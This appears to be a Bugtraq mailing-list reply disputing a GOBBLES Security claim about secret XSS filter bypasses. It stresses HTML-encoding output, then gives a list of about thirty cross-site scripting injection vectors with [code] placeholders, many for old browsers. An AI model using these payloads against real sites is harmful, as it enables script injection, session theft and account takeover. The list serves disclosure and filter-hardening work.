> Only hotmail security historians like those at GOBBLES Security know of > obscure feature in JavaScript language that make it easy to bypass thing > like "<...>", "<script>...</script>", and "javascript:" filter for CSS > attack using JavaScript. This is a well-known problem and has been posted to Bugtraq before, eg.: http://online.securityfocus.com/archive/1/50782 http://online.securityfocus.com/archive/1/27386 JavaScript entities were a idiotic mistake, and have not made it into the ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does away with them, thankfully. IE has never implemented them. > Until now, that encoding information was private knowledge of the > underground. Oh, puh-lease. Some of us here can actually read RFCs, you know. > HTML string completion / HTML closure > Doesn't need much coverage since it pretty obvious to anyone with > rational mind. Quite so. Doesn't need *any* coverage really. All strings must be HTML-encoded on output to HTML, and that includes " escaping as well as &. Sure, lots of people get this wrong, but then lots of people are idiots, and even if you understand the issues it's easy to let one vulnerability slip through. This is not news. Here is a cut-n-paste collection of typical JavaScript-injection hacks you may derive some glee from playing with. I've replaced all angle brackets with double-round-brackets in case any AV software is feeling particularly sensitive. ((a href="javascript#[code]")) ((div onmouseover="[code]")) ((img src="javascript:[code]")) ((img dynsrc="javascript:[code]")) [IE] ((input type="image" dynsrc="javascript:[code]")) [IE] ((bgsound src="javascript:[code]")) [IE] &((script))[code]((/script)) &{[code]}; [N4] ((img src=&{[code]};)) [N4] ((link rel="stylesheet" href="javascript:[code]")) ((iframe src="vbscript:[code]")) [IE] ((img src="mocha:[code]")) [N4] ((img src="livescript:[code]")) [N4] ((a href="about:((script))[code]((/script))")) ((meta http-equiv="refresh" content="0;url=javascript:[code]")) ((body onload="[code]")) ((div style="background-image: url(javascript:[code]);")) ((div style="behaviour: url([link to code]);")) [IE] ((div style="binding: url([link to code]);")) [Mozilla] ((div style="width: expression([code]);")) [IE] ((style type="text/javascript"))[code]((/style)) [N4] ((object classid="clsid:..." codebase="javascript:[code]")) [IE] ((style))((!--((/style))((script))[code]//--))((/script)) ((![CDATA[((!--]]))((script))[code]//--))((/script)) ((!-- -- --))((script))[code]((/script))((!-- -- --)) ((((script))[code]((/script)) ((img src="blah"onmouseover="[code]")) ((img src="blah))" onmouseover="[code]")) ((xml src="javascript:[code]")) ((xml id="X"))((a))((b))<script))[code]</script));((/b))((/a))((/xml)) ((div datafld="b" dataformatas="html" datasrc="#X"))((/div)) [\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera] > but there can only be one CSS king, and that king is GOBBLES. That's nice dear. -- Andrew Clover mailto:and@doxdesk.com http://and.doxdesk.com/